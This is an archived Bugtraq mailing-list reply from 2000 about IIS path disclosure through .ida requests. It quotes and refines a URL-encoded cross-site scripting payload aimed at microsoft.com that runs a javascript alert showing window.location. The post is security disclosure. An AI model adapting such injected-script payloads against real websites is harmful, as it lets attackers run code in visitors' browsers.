OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
Bugtraq Archives: Re: IIS still revealing paths for web directo

Re: IIS still revealing paths for web directories


Subject: Re: IIS still revealing paths for web directories
From: Taneli Huuskonen (huuskoneCC.HELSINKI.FI)
Date: Sat Jan 15 2000 - 04:54:11 CST


-----BEGIN PGP SIGNED MESSAGE-----

> http://www.microsoft.com/%3CIMG%20SRC=javascript:alert(%34window.location:%34%43window.location)%3E.ida

I tested the following on Netscape Lite 4.51/Export, 01-Mar-99 for
Linux:

http://www.microsoft.com/%3CIMG%20SRC=%22javascript:alert('window.location='%2Bwindow.location)%22%3E.ida

Taneli Huuskonen

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv

iQB1AwUBOIBRiAUw3ir1nvhZAQFgXwL/fpZ8guSnBTLd2P9bBuU488z8mpp2frFR
/8zL1Nd1NopTigYmf1rUWgwX+tuaMm+048KceVBC1aonrtP8cVhB6VSyjWqpJDHN
kqCio1oCXtQ83spJmq01d34/aGBjoMsF
=F7pK
-----END PGP SIGNATURE-----

--
I don't   | All messages will be PGP signed,  | Fight for your right to
speak for | encrypted mail preferred.  Keys:  | use sealed envelopes.
the Uni.  | http://www.helsinki.fi/~huuskone/ | http://www.gilc.org/



This archive was generated by hypermail 2b27 : Mon Jan 17 2000 - 19:35:28 CST